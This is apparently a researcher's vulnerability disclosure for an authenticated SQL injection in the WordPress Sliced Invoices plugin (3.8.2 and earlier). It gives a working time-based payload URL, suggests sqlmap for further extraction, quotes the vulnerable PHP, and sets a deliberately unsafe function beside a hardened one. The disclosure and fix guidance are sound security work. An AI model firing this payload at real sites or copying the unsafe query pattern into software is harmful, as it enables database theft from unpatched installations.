
Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection

source link: https://nitesculucian.github.io/2019/10/22/sliced-invoices-3-8-2-authentificated-sql-injection-vulnerability/


Oct 22, 2019 • my_exploits, offensive_security


Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection

The Wordpress Sliced Invoices plugin with a version lower than 3.8.2 is affected by an Authenticated SQL Injection vulnerability. Note that this vulnerability is highly similar to Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS, since both issues stem from the same GET parameter.

Initial submission of the vulnerability

# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
The Wordpress Sliced Invoices plugin with a version lower than 3.8.2 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept: 
 
Authenticated SQL Injection:
- Using a Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.

Detailed analysis of the vulnerability

Under wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php at line number 2202 we can observe a non-parameterized query: user-supplied data is interpolated directly into the SQL string passed to $wpdb->get_results():

$post_meta_infos = $wpdb->get_results("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");

Where the $post_id variable is assigned on line 2154 as:

/*
* get the original post id
*/
$post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);

This vulnerability could be easily exploited by accessing example.com/wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20, where example.com is your target. To retrieve more data you can use the sqlmap tool against the affected target URL.
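To make the root cause concrete, the following added example (not the plugin's code) places the unsafe pattern described above next to a hardened version built on WordPress's own APIs. It assumes it runs inside WordPress (global $wpdb, absint(), current_user_can() and wp_die() available); both function names are hypothetical.

```php
<?php
// Added example, not the Sliced Invoices plugin's code. Function names are
// hypothetical; assumes a WordPress runtime ($wpdb, absint, current_user_can, wp_die).

function sliced_duplicate_meta_unsafe() {
    global $wpdb;
    // The raw request value is interpolated straight into the SQL string, so a
    // value such as "8 and (select*from(select(sleep(20)))a)-- " becomes part of
    // the statement itself. This mirrors the vulnerable lines quoted above.
    $post_id = ( isset( $_GET['post'] ) ? $_GET['post'] : $_POST['post'] );
    return $wpdb->get_results( "SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id" );
}

function sliced_duplicate_meta_hardened() {
    global $wpdb;

    // Restrict the admin action to users who may edit posts at all.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // Coerce the id to a non-negative integer; any trailing payload is discarded
    // (absint("8 and ...") yields 8) and a non-numeric value yields 0.
    $raw     = isset( $_GET['post'] ) ? $_GET['post'] : ( isset( $_POST['post'] ) ? $_POST['post'] : 0 );
    $post_id = absint( $raw );
    if ( 0 === $post_id ) {
        wp_die( 'Invalid post id.' );
    }

    // %d placeholder: $wpdb->prepare() casts and binds the value, so request
    // input can never change the structure of the statement.
    $sql = $wpdb->prepare(
        "SELECT meta_key, meta_value FROM {$wpdb->postmeta} WHERE post_id = %d",
        $post_id
    );
    return $wpdb->get_results( $sql );
}
```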

How to fix

Update to the latest available version of the Sliced Invoices plugin.
